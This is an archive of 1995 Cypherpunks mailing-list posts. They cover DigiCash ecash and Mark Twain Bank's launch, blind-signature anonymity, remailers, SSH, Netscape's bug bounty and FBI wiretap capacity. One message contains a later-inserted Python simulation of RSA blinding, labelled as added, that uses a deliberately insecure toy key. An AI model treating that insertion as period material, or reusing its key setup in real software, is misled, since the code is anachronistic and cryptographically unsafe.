sales of advertising to third parties. 

Is the bean counter number sent to every site, or just to .netscape.com
sites?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Sun, 22 Oct 95 22:50:39 PDT
To: cypherpunks@toad.com
Subject: digicash & unix clients
Message-ID: <199510230545.WAA15604@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	I haven't seen any listing of the platforms supported by the
live digicash system. Does anyone know where that information is
available? Thanks.

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Charles Lewton <clewton@netcom.com>
Date: Sun, 22 Oct 95 22:57:13 PDT
To: sameer <sameer@c2.org>
Subject: Re: digicash & unix clients
In-Reply-To: <199510230545.WAA15604@infinity.c2.org>
Message-ID: <Pine.SUN.3.91.951022225330.24993A-100000@netcom5>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 22 Oct 1995, sameer wrote:

> 	I haven't seen any listing of the platforms supported by the
> live digicash system. Does anyone know where that information is
> available? Thanks.
> 

Ecash-info@marktwain.com  or  1-800-684-5623


> -- 
> sameer						Voice:   510-601-9777
> Community ConneXion				FAX:	 510-601-9734
> The Internet Privacy Provider			Dialin:  510-658-6376
> http://www.c2.org (or login as "guest")			sameer@c2.org
> 

Chuck




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce <wilcoxb@nagina.cs.colorado.edu>
Date: Sun, 22 Oct 95 22:25:40 PDT
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: Chaum's cash: backup?
In-Reply-To: <199510230504.WAA22965@netcom18.netcom.com>
Message-ID: <199510230524.XAA05319@nagina.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

 An entity calling itself "Vladimir Z. Nuri" <vznuri@netcom.com> 
 allegedly wrote:
>
> here is my question: of course, I'm sure they have some kind of
> a backup system. would someone care to comment on it? 
> 
> say I download $1000 to my hard drive and it crashes. what to do?
> 
> if it was like "real" cash, then it really would be lost.
> 
> if it wasn't like real cash, and the bank was actually tracking
> it, then they could determine whether it had been "spent" so far
> or prohibit someone from "cashing it in" like a hold on a check.


Well the smart thing to do is keep multiple, well-protected copies
of your cash under your own control.  I don't really know what that
press release was referring to.  Perhaps it was saying that by
revealing your blinding factor you can reveal yourself as owner of
that coin and have that coin cancelled and re-sent to you.


To my mind, if you have kept a copy of the blinding factor, you
might as well have kept a copy of the coin...



Bryce

signatures follow


            "To strive, to seek, to find and not to yield."   
    <a href="http://ugrad-www.cs.colorado.edu/~wilcoxb/Niche.html">

                          bryce@colorado.edu                   </a>



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.01

iQCVAwUBMIsm5vWZSllhfG25AQGs2gP9GhwPNDFd6C/FkNpH0/9fIQCxdD+JbdoJ
cDxGDaIaOEIdMWn8X0tBaE5Ml6RQz3XUsSCz5Yqp6tQ00KSsbYaWs+CK2/zY1dp+
sxTalu6S0+qmIivh39+X3w2pGzDuUznhd1c5rxLXUIlZO7TM9g3XGv5jm7DBnC4M
ve43K6q5fK0=
=2xcG
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Sun, 22 Oct 95 23:48:46 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape question transformed
Message-ID: <199510230647.XAA22697@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Jeff Weinstein writes:
>zoetrope@infinet.com wrote:
>>      Why would a company like Netscape jeopardise themselves by even
>> letting out a beta version so hackers have time to find bugs before the
>> full version is released. Don't take me wrong I have only been on the net
>> fer a little over a year and Love Netscape.  And If I knew what I was
>> Doing I would love to help them..... 
>
>  The reason we do it is that without wide exposure outside the
> company, it is virtually impossible to get complete testing coverage.

I see.  Who has netscape retained to review its software.  Can we have 
some public names who will vouch for the "partial testing coverage" 
before exposing it to the world??  Firms who will put their name 
on the line and say that Netscape meets all of the security guidelines 
say of the IETF -- the Internet Engineering Task Force??

Or does Netscape feel that International judgement will not matter??

> Given the incredible variety of machines, OS's, peripherals, etc.
> that are available in the real world, there is no way we could
> re-create every possible configuration in the lab.

All the more reason I guess to stick to standard.  Or don't you agree??

We're not asking you to re-create every possible configuration, but have 
you benchmarked Netscape against any standards at all??  And which ones??

>   We also can't visit every web page, or think of every combination
> of features that clever people in the real world come up with every
> day.  

This is true.  You can't visit every web page.  So what assumptions did 
you start off with when you first started your code design??  Did you 
read the appropriate memorandums upon which the Internet is built?

Did you assume that every server would be trustworthy??  That would be
extremely negligent.  That's like a bank trusting everyone who comes in
and asks if the bank can cash a check for them.

Any comments, Netscape??  Or are you still not making "official" statements.



Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Sun, 22 Oct 95 23:53:34 PDT
To: Bryce <wilcoxb@nagina.cs.colorado.edu>
Subject: Re: How can e-cash, even on-line cleared, protect payee identity?
In-Reply-To: <199510230348.VAA02972@nagina.cs.colorado.edu>
Message-ID: <Pine.SOL.3.91.951022233806.16282B-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 22 Oct 1995, Bryce wrote:

> Now it seems to me that any ecash scheme, whether cleared on-line or
> off-line, with or without double-spending-detection, will put the
> payee at risk of identification by a collusion of the payer and the

I can't remember off hand, but isn't blinding transitive? If so, there's 
an obvious way to get two way anonymity with an on-line system. If Alice 
wants to pay Bob $10, then Bob could prepare the usual squillion copies 
of the note, each with a serial number known only to Bob, then blind them 
and send them to Alice. 

Alice would then reblind them and send them to Nick, the banker. Nick
would then pick one of the notes, and ask Alice for the blinders for the
rest. Alice would then ask Bob for his blinders for the rejected notes,
and would forward both sets on to Nick, who would check them, and if
they're legit, sign the remaining copy, and return it to Alice.  

Alice could then remove her blinding factor, and send the result on to
Bob. Bob then removes his blinding factor, and can now spend the coin. 

Since Alice doesn't know the serial number, she can't reveal it to Nick 
so that he can find out who deposits the coin. Also, since Nick doesn't 
know the serial number, he can't collaborate with Bob to find out who 
Alice is. 

Does this work, or am I missing something?

Simon

---
(defun modexpt (x y n)  "computes (x^y) mod n"
  (cond ((= y 0) 1) 	((= y 1) (mod x n))
	((evenp y) (mod (expt (modexpt x (/ y 2) n) 2) n))
	(t (mod (* x (modexpt x (1- y) n)) n))))
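
Added example (not part of the original message): a Python simulation of the two-layer blinding exchange proposed above, with Bob, Alice and Nick all played inside one function, showing that RSA blinding factors can be stacked and removed one at a time. The toy key, the SHA-256 hashing, the note format, the function names and the `forged` test switch are assumptions made for this example.

```python
import hashlib
import secrets
from math import gcd

# Toy RSA key for Nick the banker. Constructed for this example from two
# publicly known Mersenne primes, so it is NOT secure; it only makes the
# arithmetic runnable.
P, Q = 2**127 - 1, 2**89 - 1
N, E = P * Q, 65537
D = pow(E, -1, (P - 1) * (Q - 1))  # bank's private exponent


def h(note):
    """Hash a note (amount plus serial number) to an integer mod N."""
    return int.from_bytes(hashlib.sha256(note).digest(), "big") % N


def fresh_factor():
    """Random blinding factor that is invertible mod N."""
    while True:
        r = secrets.randbelow(N - 2) + 2
        if gcd(r, N) == 1:
            return r


def blind(value, r):
    """Multiply by r^E; after signing this becomes a plain factor of r."""
    return value * pow(r, E, N) % N


def unblind(sig, r):
    """Divide one blinding factor back out of a signature."""
    return sig * pow(r, -1, N) % N


def bank_sign(blinded):
    return pow(blinded, D, N)


def verify(note, sig):
    return pow(sig, E, N) == h(note)


def pay(amount="10 USD", copies=8, keep=None, forged=None):
    """Run the exchange once. `keep` fixes Nick's choice (random if None);
    `forged` makes Bob slip in one note for a larger amount."""
    prefix = amount.encode() + b"|serial="
    # Bob: candidate notes with serial numbers only he knows, each blinded.
    notes = [prefix + secrets.token_hex(16).encode() for _ in range(copies)]
    if forged is not None:
        notes[forged] = b"1000 USD|serial=" + secrets.token_hex(16).encode()
    rb = [fresh_factor() for _ in notes]
    to_alice = [blind(h(n), r) for n, r in zip(notes, rb)]
    # Alice: adds her own blinding layer without learning any serial number.
    ra = [fresh_factor() for _ in to_alice]
    to_bank = [blind(v, r) for v, r in zip(to_alice, ra)]
    # Nick: keeps one candidate, has every other one opened, and checks that
    # the opened note and both factors reproduce the value he was sent.
    if keep is None:
        keep = secrets.randbelow(copies)
    for i in range(copies):
        if i == keep:
            continue
        reblinded = blind(blind(h(notes[i]), rb[i]), ra[i])
        if reblinded != to_bank[i] or not notes[i].startswith(prefix):
            raise ValueError(f"candidate {i} failed the audit")
    signed = bank_sign(to_bank[keep])
    # Alice strips her factor and forwards the result; Bob strips his.
    half = unblind(signed, ra[keep])
    sig = unblind(half, rb[keep])
    return {"note": notes[keep], "sig": sig, "bank_saw": to_bank[keep],
            "alice_saw": to_alice[keep], "alice_returned": half}


if __name__ == "__main__":
    coin = pay()
    print("coin verifies under the bank key:", verify(coin["note"], coin["sig"]))
    print("bank saw the note hash:", coin["bank_saw"] == h(coin["note"]))
```

The simulation covers the blinding algebra and the cut-and-choose audit only; double-spend detection and deposit are outside it.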





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: RobL <robl@on-ramp.ior.com>
Date: Sun, 22 Oct 95 23:57:43 PDT
To: Jim.Cannell@f21.n216.z1.fidonet.org (Jim Cannell)
Subject: Re: FidoNet Remailer
Message-ID: <m0t7Gp1-000RpFC@on-ramp.ior.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:34 PM 10/20/95 -0400, Jim Cannell wrote:
>
>=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
>
>-----BEGIN PGP SIGNED MESSAGE-----
>
>I have been a long time lurker on this list, as well as having a long time
>interest in crypto.  Most of my activity in this area has been on FidoNet
>rather than the internet.  Due to the control phreak nature of much of
>FidoNet, I've spent a lot of time and effort in an attempt to just simply
>route around the bastards.  I created the SecureMail system, which is a
>network of FidoNet nodes that agree to route any and all traffic without
>monitoring or censorship.  Within SecureMail, encrypted traffic is not
>only permitted, it is encouraged.


At the end of the month, I will be putting my BBS back online with new
software which is more Fido friendly than what I had been using.. I would be
interested in your SecureMail system as an alternative to the mind-numbing
strictness normally associated with FidoNet.. Any chance I can get more info?

Thanks-
RobL





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Mon, 23 Oct 95 00:21:33 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape rewards are an insult
Message-ID: <199510230720.AAA15634@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


>> 	The idea that Netscape (like Microsoft) thinks they can get free
>> testing services from all over the net by real experts just by offering
>> a tee shirt is downright offensive.
>
>   
>THE NETSCAPE BUGS BOUNTY 
>
>(major snip)   
>   
>   And if the security bug you find is severe as defined by Netscape, and
>   hasn't been previously found, and can be reproduced by us, we'll write
>   you a check for $1000. 

Ha!  I reported a serious problem to Netscape ten days ago, on Thursday
the twelfth.  They haven't even returned an answer to my email yet nor
even acknowledged its receipt. 

Yep, I guess that their check is in the mail ....

Has anyone else seen or heard anything??  T-shirts, mugs, checks, or 
email being returned or answered??



Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@use.usit.net>
Date: Sun, 22 Oct 95 22:28:47 PDT
To: cypherpunks@toad.com
Subject: Freeh wants to wiretap millions
Message-ID: <Pine.SOL.3.91.951023011300.27963E-100000@use.usit.net>
MIME-Version: 1.0
Content-Type: text/plain


Excerpt from latest CDT bulletin...

Mr. (Un)Freeh wants to be able to monitor (perhaps as much as) the most 
troublesome 1% of the population. This would appear to be a rather large 
expansion of telephone wiretapping.

bd

---------- Forwarded message ----------
[Excerpt]

  CENTER FOR DEMOCRACY AND TECHNOLOGY
------------------------------------------------------------------------
  A briefing on public policy issues affecting civil liberties online
------------------------------------------------------------------------
CDT POLICY POST Number 26                      October 20, 1995

CONTENTS: (1) FBI Announces Digital Telephony Surveillance Capacity Request
          (2) Subscribe To The CDT Policy Post Distribution List
          (3) About CDT, Contacting Us


(1) FBI NOTICE BEGINS DIGITAL TELEPHONY COMPLIANCE PROCESS -- PUBLIC
    ACCOUNTABILITY FOR FBI REQUEST ESSENTIAL

On Monday October 16 1995, the FBI published its initial request for
surveillance capacity as required under Section 104 (a) of the
Communications Assistance for Law Enforcement Act (PL 104-144, a.k.a.
Digital Telephony).  As required by law, the FBI will accept public
comments on the proposed capacity requirements for 30 days (ending November
15, 1995).  The notice, which includes instructions for submitting
comments, is attached below.

[...]

SURVEILLANCE CAPACITY REQUIREMENTS

Section 104 of CALEA requires telecommunications carriers to ensure that
their systems possess sufficient capacity to accommodate a specified number
of simultaneous intercepts, pen register, and trap and trace devices.  As
required by Section 104 (a)(1), the FBI, after consultation with state and
local law enforcement officials and the telecommunications industry, has
published an initial notice of capacity requirements.  Section 104 (a)(1)
requires that the FBI seek public comment and then publish in the federal
register and provide to telecommunications carriers:

[...]

CATEGORY I -- Areas With Heavy Surveillance Activity

Large urban areas and other areas the FBI estimates require the greatest
surveillance capacity would fall under Category I [page 53646, see below].

ACTUAL CAPACITY: .5% of engineered capacity, or 500 simultaneous
surveillance orders for each equipment, facility, or service serving
100,000 subscribers.

MAXIMUM CAPACITY: 1% of engineered capacity, or 1000 simultaneous
surveillance orders for each equipment, facility, or service serving
100,000 subscribers, by 1998.
_______________________________________________________________________

[...]

[editor's note -- Appendices have been deleted to save space.  The entire
text of this document can be found at CDT's Digital Telephony Web Page,
URL:http://www.cdt.org/digtel.html]

Dated: October 10, 1995.

Louis J. Freeh,
Director.

[FR Doc. 95-25562 Filed 10-13-95; 8:45 am]
BILLING CODE 4410-02-M

---------------------------------------------------------------------------
(3) HOW TO SUBSCRIBE TO THE CDT POLICY POST LIST

To subscribe to the policy post distribution list, send mail to
"Majordomo@cdt.org" with:

    subscribe policy-posts

in the body of the message (leave the subject line blank)
[...]





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wei Dai <weidai@eskimo.com>
Date: Mon, 23 Oct 95 02:53:19 PDT
To: Tatu Ylonen <ylo@cs.hut.fi>
Subject: Re: Encrypted TCP Tunneler
In-Reply-To: <199510230100.DAA00697@soikko.cs.hut.fi>
Message-ID: <Pine.SUN.3.91.951023022123.9641C-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 23 Oct 1995, Tatu Ylonen wrote:

> Are you familiar with ssh [http://www.cs.hut.fi/ssh]?  It has many of
> the features that you are planning.

I saw the announcement for ssh a while ago, but didn't get a copy because
it doesn't run under MS Windows.  I just downloaded a copy today and read
some of the documentation.  It apparently has many of the features I
talked about, plus lots more. 

However, I probably won't give up ETT yet, because there are some design 
differences that would make ETT more useful in certain circumstances.  
SSH seems to be designed mainly as a secure telnet program, with TCP port 
redirection added on, which suggests (although I'm not sure) that you 
need to have a user account on the SSH server to connect to it.  It also 
does not seem to do any filtering of TCP redirection requests.  Chaining 
would not work well with SSH because of its packet overhead.

I'll try to get SSH working soon, but so far I am very impressed with it.
I am curious, however, about your choice of key exchange and
authentication schemes.  What are the relative advantages of your protocol
over a more straight-forward DH + signature of exchange values?  DH would
provide forward secrecy directly without the need to change the server key
every hour. 

Wei Dai




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tatu Ylonen <ylo@cs.hut.fi>
Date: Sun, 22 Oct 95 16:49:15 PDT
To: weidai@eskimo.com
Subject: Re: Encrypted TCP Tunneler
In-Reply-To: <Pine.SUN.3.91.951021145844.29391F-100000@eskimo.com>
Message-ID: <199510230100.DAA00697@soikko.cs.hut.fi>
MIME-Version: 1.0
Content-Type: text/plain


> an ETT client and an ETT server, using Diffie-Hellman and DSA for

You are aware that RSADSI claims they have exclusive licensing rights
for DSA?

Are you familiar with ssh [http://www.cs.hut.fi/ssh]?  It has many of
the features that you are planning.

    Tatu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Mon, 23 Oct 95 00:07:48 PDT
To: remailer-operators@c2.org (Remailer Operators List)
Subject: Re: require for new remailer list tag?
In-Reply-To: <199510221604.JAA08498@infinity.c2.org>
Message-ID: <199510230707.DAA22204@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


sameer suggests the creation of a new remailer list property, "permanent",
to denote a remailer expected by its operator(s) to persist indefinitely.

I'm curious about the potential sociological effects of such a move. I
imagine that pseudonyms would be attracted to "permanent" remailers for
use in their reply chains. But this phenomenon could/should be mitigated by
the possibility that sting remailers would tend to advertise themselves as
"permanent" (truthfully, even !), in anticipation of the bias in pseudonym
remailer chain inclusion.

Enemies of anonymity might specially target remailers claiming to be 
"permanent" for antisocial uses.

This is all similar to the effects (observed and supposed) of the existing
reliability ratings for remailers. But the sharp contrast of a binary 
property might make the effects more pronounced.

Perhaps it would be useful/meaningful to note the duration (or
starting date) of each remailer's term of operation, on the theory that past
survival is some indicator of the chances for continued existence.

Anyway, I think it would be an interesting experiment to try.

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Marcel van der Peijl <bigmac@digicash.com>
Date: Sun, 22 Oct 95 20:47:45 PDT
To: www-buyinfo@allegra.att.com
Subject: Mark Twain Bank Launches Ecash
Message-ID: <199510230347.EAA23772@digicash.com>
MIME-Version: 1.0
Content-Type: text/plain


---------------------------PRESS RELEASE------------------------

Release date:                  Contact DigiCash New York:
Monday, October 23, 1995       Mr. Daniel M. Eldridge
Amsterdam, The Netherlands     Tel: +1 212 909 2955 (direct)
                                    +1 212 909 4092 (main)
                               Fax: +1 212 318 1222
                               email: eldridge@digicash.com

Contact DigiCash Amsterdam:    Contact Mark Twain Bank St. Louis:
Mr. Paul Dinnissen             Mr. Frank O. Trotter, III
Tel: +31 20 665 2611           Tel: +1 314 997 9213
Fax: +31 20 668 5486           Fax: +1 314 569 4906
email: press@digicash.com      email: ftrotter@marktwain.com
http://www.digicash.com/       http://www.marktwain.com/


                Mark Twain Bank Launches Ecash
                ==============================

      -----------------------------------------------------
      Mark Twain Bank begins operating DigiCash's ecash(TM)
               on the Internet with U.S. Dollars
      -----------------------------------------------------

     Mark Twain Bank of St. Louis Missouri starts accepting
applications Monday October 23, 1995 for accounts that can be
used to withdraw and deposit ecash over the Internet.
DigiCash(TM) bv, of Amsterdam, the Netherlands, developer of
ecash, is supplying the technology to Mark Twain Bank under
non-exclusive license. The technology has been tested with a
'monopoly(TM) money' currency called CyberBucks(TM), but this U.S.
dollar denominated system is the first time electronic cash is
actually being offered using real currency.

     "This launch marks the beginning of a new era, one in
which the digital equivalent of paper money and coins will
become even more important than their physical precursors are
today," according to Dr. David Chaum, Managing Director of
DigiCash bv and inventor of electronic cash. "It will catalyze
enormous growth in electronic commerce on the Internet, and
prove of enduring value through its improved protection of
consumers and society at large."

     Sweden Post, another ecash licensee, owns the retail bank
that is responsible for more than 50% of value transfers in
Sweden and has direct access to accounts of over 75% of Swedish
households. Sweden Post has not yet announced its launch date.

How does it work
----------------
     Using ecash is like using a virtual ATM (Automatic Teller
Machine). When connecting to it over the Internet, you
authenticate ownership of your account and request the amount of
ecash you want to withdraw, much like in person. But instead of
putting paper cash in your wallet, your software stores the
digital cash it obtains onto the hard disk of your PC.

     When you are asked to make a payment on the net, you
confirm the amount, purpose and payee and then your ecash
software transfers the correct value in coins from your disk.
Sellers, ranging from casual participants in the global Internet
bazaar to mega-retailers, deposit the digital coins they receive
into their accounts.

     Behind the user interface, your computer actually chooses
the serial numbers of the electronic coins based on a random
seed. Then it hides them in special encryption envelopes,
provides them to the virtual ATM for signing, and removes the
envelopes from what is returned--leaving the bank's validating
digital signature on the serial numbers. This way, when the
bank receives from the shop the coins you spend, it cannot
recognize them as coming from any particular withdrawal,
because they were hidden in envelopes during withdrawal. And
thus the bank cannot know when or where you shop or what you
buy.

     The serial number of each signed coin is unique, allowing
the bank to be sure it never accepts the same coin twice. In
case you wish to identify the recipient of any of your
payments, you can also reveal the serial number and prove that
you formed it. And, in case your computer were ever to break
down, if you had written down the secret random seed number you
chose initially when opening your account, future versions
would let you use it to re-create the coins in envelopes and
thereby obtain a free re-issue of the signed coins that were
lost.

How safe is it
--------------
     Security is fundamental to electronic cash. The
cryptographic coding protecting every 5 cent ecash payment is
the same as that routinely relied upon for authenticating
requests to move huge sums between banks and even for national
security. But in principle ecash goes beyond such
communications security to achieve true multiparty security: no
one (buyer, seller, bank) can cheat anyone else, no matter how
they might modify their own software; even if two parties
collude, they cannot cheat the third.

     Replacing paper and coins with ecash would make life much
harder for criminals. Because the payer's computer chooses the
serial numbers of the coins, he or she can later irrefutably
identify blackmarketeers, extortionists, and acceptors of
bribes--were they to take ecash. Paper notes, briefcases full of
which can be received without leaving any record, allow money
laundering and tax evasion today. With ecash, however, all the
amounts each person receives are known to their bank.
Significant criminal activity could thus be thwarted by
completely replacing paper money; moreover, the privacy of ecash
would be essential to widespread acceptance of any electronic
payment system that in effect becomes mandatory.

Early, competing, and future systems
------------------------------------
     Customers of Mark Twain Bank will have to fill out an
application form that is available over the Internet, mail or
fax it in, and receive a password by mail. The bank's unique
multi-currency facilities will allow use from many countries. In
the future, the ability to withdraw funds from ordinary checking
accounts will be as ubiquitous as making withdrawals at physical
ATMs today. Frequent visits to digital branches will give banks
the opportunity to offer a full range of financial services to
their customers.

     The over 60,000 people who registered for the CyberBucks
experiment--more than all the other cyber-payment schemes
combined--suggests a high level of support and interest in
ecash. DigiCash plans to keep the experiment going for those
who wish to continue using it.

     After CyberBucks went live almost exactly one year ago,
and became the first cryptographically protected Internet
payment scheme, a plethora of "me-too" schemes have been
announced. Most are simply account-based, accepting requests
from users to move money from their account to a specified
other account, thereby revealing to the central system exactly
when, how much, and to whom they pay, and putting users at the
mercy of system errors that may result in loss of money or
unexpected lock out. Only ecash works with digital coins,
empowering people with full control over their side of
financial transactions and full control over when and to whom
identifying information is released.

     Ecash is currently software only: once you've opened an
account you just download the software over the net and you're
ready to run. DigiCash is developing chip cards and simple
readers which will provide even more security and
portability of ecash between machines.

     DigiCash does not aim to operate ecash systems itself, but
rather to continue developing new versions and licensing to
financial institutions.

(The following are trademarks and should always be referred to
as such: CyberBucks, DigiCash, ecash, Mark Twain Bank and
Monopoly.)

*  *  *  *  *  *  *  *  *  *  *  *  *  *  *  *  *  *  *  *  *  *

                  DigiCash Backgrounder
                  =====================

History and Mission
-------------------
     Since beginning operation in April 1990, DigiCash's mission
and primary activity has been: to develop and license payment
technology products--chip card, software only, and hybrid--that
both show the true capability of technology to protect the
interests of all participants and are competitive in the market.

Founder
-------
     Dr. David Chaum, managing director of DigiCash, received
his Ph.D. in Computer Science from the University of California
at Berkeley, then taught at New York University Graduate School
of Business Administration and at the University of California,
and headed the Cryptography Group at CWI, the Dutch nationally
funded center for research in mathematics and computer science,
before taking his current position. He has published over 45
original technical articles on cryptography and also founded the
International Association for Cryptologic Research.

DigiCash Products
-----------------
Blue: smart card technology for EMV & prepaid with dynamic public key
  Conforms to joint Europay, MasterCard, Visa specifications;
  multiple applications including loyalty and closed systems;
  superior data integrity in case of malicious/accidental
  interference/interruption; requires only the smallest and most
  proven chips, e.g. SC-24 or ST601; mask technology licensing.

CAFE: smart card and card-accepting electronic wallet project
  Consortium of 12 other members founded and chaired by
  Dr. Chaum of DigiCash; simulation, mask and first readers
  developed by DigiCash; trial in November 1995 at the European
  Commission headquarters building; technology trial in
  participation with related open special interest group and
  partially funded by the EC.

DyniCash: highway-speed road-toll collection system using smart cards
  Chip card inserts into battery-powered dashboard unit;
  reflected backscatter microwave technology by industry leader
  Amtech; prepaid mode has user privacy; open and/or closed
  pricing schemes; tested extensively in Japan; non-exclusive
  licensing of the payment technology.

Ecash(TM): software only electronic cash system for internet/email
  Users download software that can make and receive payments;
  protects users' money like travellers checks and privacy like
  coins; world-wide experiment with tens of thousands of users;
  Macintosh, MS-Windows and X-Windows; any WWW browser; user
  software free with issuer licensing.

Facility Card: complete facility management smart-card/reader system
  Cash replacement, access control, and time/attendance system;
  now in schools, hospitals, industry, offices, recreation;
  interfaces to vending, point-of-sale, access control, copiers,
  phones, gaming; downloadable & upgradeable readers work on-line
  and/or off-line; sold through VAR's.

*  *  *  *  *  *  *  *  *  *  *  *  *  *  *  *  *  *  *  *  *  *

                    Early Adopter Companies
                    =======================

AdOne Classified Network (Steve Brotman, +1 212 431 5842,
http://www.adone.com/)

BizNet Technologies (Doug Mauer, +1 540 231 7715,
http://www.bnt.com/)

Consensus Development Corporation (Christopher Allen, +1 510
559 1500, http://www.consensus.com/)

Delorie Software (http://www.delorie.com/)

Global-X-Change Communications (Elliot Burdett, +1 613 235 6865,
http://www.globalx.net/)

PULVER.COM (Jeff Pulver, +1 917 336 8240, http://www.pulver.com/)

Sun Microsystems (Humphrey Polanen, +1 415 336 0022,
http://www.sun.com/)

The Electronic Frontier Foundation (EFF) (Stanton McCandlish,
+1 415 668 7171, http://www.eff.org/)

The Electronic Privacy Information Center (EPIC) (Marc
Rotenberg, +1 202 546 6520, http://www.epic.org/)

The New Sun Newspaper (Lese Dunton, +1 212 799 7402,
http://shebute.com/newsun/today/)

The Well (Bruce Katz, +1 415 332 4335, http://www.well.com/)

Walter Shelby Group (John Buckman,
http://www.shelby.com/pub/shelby/)

These companies are offering their clients ecash(TM)
----------------------------------------------------
Husky Labs (David Levine, +1 410 889 3409,
http://www.butterfly.net/)

  (Clients: National Public Radio, The National Geographic
  Society, PoliticsUSA, Penguin Books, E-Z Communications,
  Pentagon Cds and Tapes, AfroAmerican Newspapers, Ellicott
  Machine Corp., The Greater Baltimore Committee Technology
  Council, National Petroleum Council, Netv, Review.Net, Robert
  Rytter & Associates, and United States Holocaust Memorial
  Museum)

Organic Online (Brian Behlendorf, +1 415 284 6888,
http://www.organic.com/)

  (Clients: Advertising Age, Saturn Cars, Rubin Postaer Agency,
  Sybase, Inc., Volvo Cars of North America, Xircom,
  1-800-Collect, Conari Press Books, Great American Music Hall,
  City of Tribes Communications, Octel, Montgomery Securities,
  Macromedia)

Poppe Tyson Advertising (Fergus O'Daly, +1 212 727 5600,
http://www.poppe.com/)

  (Clients: American Express Travel Agency, PSINet Inc.,
  Intercon Systems Corp., Fordham University, New York Cruise
  Lines Inc., Osram Sylvania, Pfizer, Food Service Group,
  Ridgewood Savings Bank, Warner Lambert, Drew, EUA COGENEX, New
  Jersey Travel and Tourism, AT&T, American Isuzu Motors,
  DataProducts, Magellan, Toshiba America, Computer Systems
  Division, Toshiba Computer Systems, Toshiba Disk Products,
  Applied Medical Informatics, Cascade Design Automation,
  Chrysler Corp., Cirrus Logic, Cypress Semiconductor, Escalade,
  Hewlett-Packard, Hyundai Electronics America, Intel Corp.,
  International Network Services, Internet Profiles Corp.,
  LANNET, Logic Modeling, Measurex, MIPS Technologies, Netscape
  Communications Corporation, Network Equipment Technologies,
  Network General, Nokia, North Mountain Software, Premisys
  Radiomail, Red Herring Magazine, Robert Half International,
  Sony Electronics Inc., Broadcast Product Group, Sync Research,
  Synopsys, Synopsys Logic Modeling Group, Touche, Valvoline)

*  *  *  *  *  *  *  *  *  *  *  *  *  *  *  *  *  *  *  *  *  *

                   Further Documents Available
                   ===========================

1. "The Ease of Using ecash",
   tutorial, October 1995, 10 pages. (Text with diagrams.)

2. Congressional Testimony:

   text of testimony delivered by Dr. David Chaum to Committee
   Hearing of the U.S. House of Representatives: "The Future of
   Money", Subcommittee on Domestic and International Monetary
   Policy; Committee on Banking and Financial Services, July
   1995, 3 pages. (Text only.)

3. "Achieving Electronic Privacy",
   by Dr. David Chaum, Scientific American, August 1992, 6 pages.
   (Text with diagrams.)

4. European Union - Project CAFE:
   Conditional Access For Europe, brochure, 1994, 2 pages.
   (Text only online, diagrams and text only by post.)


How to obtain documents
-----------------------
Items 1-4 are available on our World Wide Web Server at:

1) http://www.digicash.com/publish/ecash_intro/ecash_intro.html
2) http://www.digicash.com/publish/testimony.html
3) http://www.digicash.com/publish/sciam.html
4) http://www.digicash.com/products/projects/cafe.html

Please let us know, if you would like to receive any of
Items 1-4 in one of the following other formats:

a) via electronic mail in plain text (ascii) format,
(Item 1 and 4 unavailable)
b) via facsimile
c) via post

---------------------------PRESS RELEASE------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Mon, 23 Oct 95 07:00:06 PDT
To: cypherpunks@toad.com
Subject: List of reliable remailers
Message-ID: <199510231359.GAA26702@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


   I operate a remailer pinging service which collects detailed
information about remailer features and reliability.

   To use it, just finger remailer-list@kiwi.cs.berkeley.edu

   There is also a Web version of the same information, plus lots of
interesting links to remailer-related resources, at:
http://www.cs.berkeley.edu/~raph/remailer-list.html

   This information is used by premail, a remailer chaining and PGP
encrypting client for outgoing mail, which is available at:
ftp://ftp.csua.berkeley.edu/pub/cypherpunks/premail/premail-0.33a.tar.gz

   For the PGP public keys of the remailers, finger
pgpkeys@kiwi.cs.berkeley.edu

